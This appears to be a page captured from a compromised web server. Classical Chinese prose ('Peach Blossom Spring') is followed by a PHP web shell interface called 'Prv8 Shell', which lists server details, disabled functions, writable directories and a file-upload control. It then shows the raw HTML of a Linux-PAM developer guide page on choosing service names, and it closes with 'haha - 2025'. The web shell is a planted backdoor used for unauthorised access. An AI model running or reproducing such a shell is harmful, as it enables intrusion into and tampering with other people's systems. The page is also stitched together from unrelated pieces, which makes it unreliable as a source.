晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /usr/share/doc/pam-devel/html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/doc/pam-devel/html/adg-security-service-name.html
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>4.2. Choice of a service name</title><meta name="generator" content="DocBook XSL Stylesheets Vsnapshot"><link rel="home" href="Linux-PAM_ADG.html" title="The Linux-PAM Application Developers' Guide"><link rel="up" href="adg-security.html" title="Chapter 4.  Security issues of Linux-PAM"><link rel="prev" href="adg-security-library-calls.html" title="4.1. Care about standard library calls"><link rel="next" href="adg-security-conv-function.html" title="4.3. The conversation function"></head><body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"><div class="navheader"><table width="100%" summary="Navigation header"><tr><th colspan="3" align="center">4.2. Choice of a service name</th></tr><tr><td width="20%" align="left"><a accesskey="p" href="adg-security-library-calls.html">Prev</a> </td><th width="60%" align="center">Chapter 4. 
      Security issues of <span class="emphasis"><em>Linux-PAM</em></span>
    </th><td width="20%" align="right"> <a accesskey="n" href="adg-security-conv-function.html">Next</a></td></tr></table><hr></div><div class="section"><div class="titlepage"><div><div><h2 class="title" style="clear: both"><a name="adg-security-service-name"></a>4.2. Choice of a service name</h2></div></div></div><p>
        When picking the <span class="emphasis"><em>service-name</em></span> that
        corresponds to the first entry in the
        <span class="emphasis"><em>Linux-PAM</em></span> configuration file,
        the application programmer should <span class="emphasis"><em>avoid</em></span>
        the temptation of choosing something related to
        <code class="varname">argv[0]</code>. It is a trivial matter for any user
        to invoke any application on a system under a different name and
        this should not be permitted to cause a security breach.
      </p><p>
        In general, this is always the right advice if the program is
        setuid, or otherwise more privileged than the user that invokes
        it. In some cases, avoiding this advice is convenient, but as an
        author of such an application, you should consider well the ways
        in which your program will be installed and used. (Its often the
        case that programs are not intended to be setuid, but end up
        being installed that way for convenience. If your program falls
        into this category, don't fall into the trap of making this mistake.)
      </p><p>
        To invoke some <span class="emphasis"><em>target</em></span> application by
        another name, the user may symbolically link the target application
        with the desired name. To be precise all the user need do is,
        <span class="command"><strong>ln -s /target/application ./preferred_name</strong></span>
        and then run <span class="command"><strong>./preferred_name</strong></span>.
      </p><p>
        By studying the <span class="emphasis"><em>Linux-PAM</em></span>
        configuration file(s), an attacker can choose the
        <span class="command"><strong>preferred_name</strong></span> to be that of a service enjoying
        minimal protection; for example a game which uses
        <span class="emphasis"><em>Linux-PAM</em></span> to restrict access to
        certain hours of the day.  If the service-name were to be linked
        to the filename under which the service was invoked, it
        is clear that the user is effectively in the position of
        dictating which authentication scheme the service uses. Needless
        to say, this is not a secure situation.
      </p><p>
        The conclusion is that the application developer should carefully
        define the service-name of an application. The safest thing is to
        make it a single hard-wired name.
      </p></div><div class="navfooter"><hr><table width="100%" summary="Navigation footer"><tr><td width="40%" align="left"><a accesskey="p" href="adg-security-library-calls.html">Prev</a> </td><td width="20%" align="center"><a accesskey="u" href="adg-security.html">Up</a></td><td width="40%" align="right"> <a accesskey="n" href="adg-security-conv-function.html">Next</a></td></tr><tr><td width="40%" align="left" valign="top">4.1. Care about standard library calls </td><td width="20%" align="center"><a accesskey="h" href="Linux-PAM_ADG.html">Home</a></td><td width="40%" align="right" valign="top"> 4.3. The conversation function</td></tr></table></div></body></html>

haha - 2025